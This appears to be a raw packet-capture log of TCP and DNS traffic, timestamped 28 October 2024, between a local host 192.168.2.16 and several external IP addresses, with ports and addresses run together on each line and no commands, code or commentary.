                                                                                                                                                              Oct 28, 2024 19:45:31.843945980 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:31.843961954 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.844974041 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:31.845130920 CET44349715172.217.16.196192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:31.845202923 CET49715443192.168.2.16172.217.16.196
                                                                                                                                                              Oct 28, 2024 19:45:32.160170078 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.160275936 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.160386086 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.160574913 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.160614014 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.169523001 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.169570923 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.169653893 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.169862032 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.169881105 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.843586922 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.843923092 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.843985081 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.844868898 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.845216990 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.845314026 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.845351934 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.863295078 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.872999907 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.873047113 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.874522924 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.886861086 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.887096882 CET44349717166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.887336016 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:32.896979094 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:32.897962093 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                              Oct 28, 2024 19:45:32.928981066 CET49717443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.123344898 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123402119 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123421907 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123440027 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123478889 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123495102 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.123497009 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123519897 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.123523951 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.123538017 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.123569965 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.123603106 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.141108036 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.141164064 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.141191959 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.141222000 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.141251087 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.183991909 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.241101027 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.241132975 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.241178036 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.241211891 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.241246939 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.241265059 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.241319895 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.247980118 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                              Oct 28, 2024 19:45:33.257421970 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.257466078 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.257540941 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.257556915 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.257586002 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.257635117 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.258225918 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.258292913 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.258306980 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.258393049 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.258447886 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.258466005 CET44349716166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.258501053 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.258501053 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.258543968 CET49716443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:45:33.285149097 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.290477037 CET53497191.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.290541887 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.290586948 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.290599108 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.290666103 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:33.290918112 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:33.290968895 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.291033983 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:33.291253090 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:33.291282892 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.295948029 CET53497191.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.295994043 CET53497191.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.338958025 CET53497191.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.769934893 CET53497191.1.1.1192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:33.770092964 CET4971953192.168.2.161.1.1.1
                                                                                                                                                              Oct 28, 2024 19:45:34.139941931 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.140263081 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.140315056 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.141834021 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.141927004 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.143201113 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.143302917 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.144103050 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.144119978 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.190013885 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.383424997 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.383455992 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.383528948 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.383549929 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.384160995 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.384212971 CET44349720162.19.58.157192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.384288073 CET49720443192.168.2.16162.19.58.157
                                                                                                                                                              Oct 28, 2024 19:45:34.395745993 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:34.395773888 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.395853996 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:34.396045923 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:34.396060944 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:34.654031038 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                              Oct 28, 2024 19:45:35.092046976 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:35.092308998 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:35.092323065 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:35.093854904 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:35.093933105 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:35.094283104 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:35.094394922 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:35.094424963 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:35.135375977 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:35.148972034 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:35.148978949 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:35.197072983 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:35.259202003 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:35.259237051 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:35.259304047 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:35.259318113 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:35.259331942 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:35.259396076 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:35.259794950 CET49722443192.168.2.16169.197.85.95
                                                                                                                                                              Oct 28, 2024 19:45:35.259804010 CET44349722169.197.85.95192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:45:37.704034090 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                              Oct 28, 2024 19:45:42.857004881 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                              Oct 28, 2024 19:45:47.312062025 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                              Oct 28, 2024 19:46:03.464350939 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:03.464435101 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:03.464545012 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:03.464879990 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:03.464912891 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.246216059 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.246336937 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.247536898 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.247555017 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.248012066 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.249351978 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.295373917 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.505836964 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.505877972 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.505897999 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.505947113 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.505979061 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.506017923 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.506056070 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.511580944 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.511620998 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.511677027 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.511692047 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.511720896 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.511723995 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.511780977 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.511821985 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.511822939 CET49723443192.168.2.16172.202.163.200
                                                                                                                                                              Oct 28, 2024 19:46:04.511857033 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:04.511878014 CET44349723172.202.163.200192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:11.386353970 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:11.386425018 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:11.386533976 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:11.389281988 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:11.389307022 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.141395092 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.141576052 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.208297968 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.208357096 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.209259033 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.209331989 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.210875988 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.255357981 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.390989065 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.391042948 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.391086102 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.391110897 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.391154051 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.391154051 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.391192913 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.391237020 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.391247988 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.391299963 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.391423941 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:12.391472101 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.394208908 CET49724443192.168.2.16166.1.160.75
                                                                                                                                                              Oct 28, 2024 19:46:12.394237041 CET44349724166.1.160.75192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:15.753283978 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:15.758704901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:15.758802891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:15.759381056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:15.764691114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:16.434668064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:16.435194016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:16.435282946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:16.435560942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:16.435992002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:16.436047077 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:16.830071926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:16.835517883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:16.993619919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.038167000 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.054976940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.060491085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.218087912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.218156099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.218231916 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.218616962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.218653917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.218713999 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.219615936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.219650984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.219682932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.219707012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.220647097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.220680952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.220704079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.221636057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.221671104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.221690893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.222604036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.222640038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.222667933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.277112961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.336853981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.337006092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.337042093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.337084055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.337964058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.337997913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.338027000 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.338910103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.338943005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.338977098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.338989019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.339030981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.339783907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.339817047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.339879036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.340820074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.340853930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.340920925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.341797113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.341833115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.341897011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.342848063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.342881918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.342916012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.342936039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.343820095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.343853951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.343873024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.344846964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.344881058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.344916105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.345856905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.345890999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.345915079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.346632004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.346683979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.346692085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.389168978 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.455271006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.455672026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.455708981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.455746889 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.456440926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.456521988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.456676006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.456707001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.456739902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.456763983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.457629919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.457667112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.457684040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.458651066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.458684921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.458717108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.459665060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.459700108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.459721088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.460664988 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.460701942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.460719109 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.460735083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.460787058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.461668015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.461700916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.461752892 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.462727070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.462760925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.462793112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.462820053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:17.463768959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:17.463803053 CET8049726166.1.160.211192.168.2.16
